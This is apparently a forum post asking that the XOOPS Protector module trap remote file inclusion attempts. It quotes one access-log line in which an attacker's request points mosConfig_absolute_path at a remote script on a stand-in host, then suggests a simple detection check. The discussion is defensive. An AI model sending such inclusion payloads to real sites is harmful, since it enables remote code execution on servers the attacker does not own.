Have been using Protector for a while, and would like to see it "trap" any HTTP request, that is obviously trying to parse a script from a remote site. These do not always result in a 403 or a 404 either, depending upon server security and configuration.
The type of requests are of the format:
Quote:
208.113.196.15 - - [09/May/2008:04:54:57 +1000] "GET /modules/xhld0/index.php?_REQUEST=&_REQUEST%5boption%5d=com_zoom&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://example.com/modules/test.txt??? HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
(domain name of remote url changed in the above, for obvious reasons).
returns a 302, and often other attempts at remote script parsing, return a 200, so XOOPS thinks that "all is well", despite the fact that Protector is installed.
I don't think the 'blanket approach' of setting "allow_url_fopen" value to off is suitable for all sites. Turning this option off is recommended when using Protector, however server setup/config., and especially PHP version, has a bearing on whether or not this setting should really be off.
See these discussions:
http://foundationphp.com/phpsolutions/updates.php
http://www.webmasterworld.com/forum88/10940.htm
Determining if the string 'http' was being parsed, could be something like ..
$pos = strpos(strtolower($_SERVER['REQUEST_URI']), 'http:');
As the version of PHP has some bearing on the
need to have the setting "allow_url_fopen" value to off, the PHP function phpversion() could be utilised.
My 0.001 cents worth anyway.
